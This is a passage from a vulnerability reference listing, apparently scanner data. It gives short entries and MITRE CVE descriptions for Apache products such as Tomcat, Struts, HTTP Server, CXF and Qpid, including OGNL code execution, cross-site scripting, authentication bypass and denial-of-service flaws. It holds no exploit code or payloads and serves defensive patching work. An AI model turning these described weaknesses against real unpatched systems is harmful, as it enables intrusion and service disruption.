13263| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
13264| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13265| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13266| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13267| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
13268| [38524] Apache Geronimo 2.0 unknown vulnerability
13269| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13270| [38331] Apache Tomcat 4.1.24 information disclosure
13271| [38330] Apache Tomcat 4.1.24 information disclosure
13272| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13273| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13274| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13275| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13276| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13277| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13278| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13279| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13280| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13281| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13282| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13283| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13284| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13285| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13286| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13287| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13288| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13289| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13290| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13291| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13292| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13293| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13294| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13295| [34252] Apache HTTP Server denial of service
13296| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13297| [33877] Apache Opentaps 0.9.3 cross site scripting
13298| [33876] Apache Open For Business Project unknown vulnerability
13299| [33875] Apache Open For Business Project cross site scripting
13300| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
13301| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13302|
13303| MITRE CVE - https://cve.mitre.org:
13304| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13305| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13306| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13307| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
13308| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13309| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13310| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13311| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13312| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13313| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13314| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13315| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13316| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
13317| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13318| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13319| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13320| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13321| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13322| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13323| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13324| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13325| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13326| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13327| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13328| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13329| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13330| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13331| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13332| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13333| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13334| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13335| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13336| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13337| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13338| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13339| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13340| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13341| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13342| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13343| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13344| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13345| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13346| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13347| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13348| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13349| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13350| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13351| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13352| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13353| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13354| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13355| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13356| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13357| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13358| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13359| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13360| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13361| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13362| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13363| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13364| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13365| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13366| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13367| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13368| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13369| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13370| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13371| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13372| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13373| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13374| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13375| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13376| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13377| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13378| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13379| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13380| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13381| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13382| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13383| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13384| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13385| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13386| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13387| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13388| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13389| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13390| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13391| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13392| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13393| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13394| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13395| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13396| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13397| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13398| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13399| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13400| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13401| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13402| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13403| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13404| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13405| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13406| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13407| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13408| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13409| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13410| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13411| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13412| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13413| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13414| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13415| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
13416| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13417| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
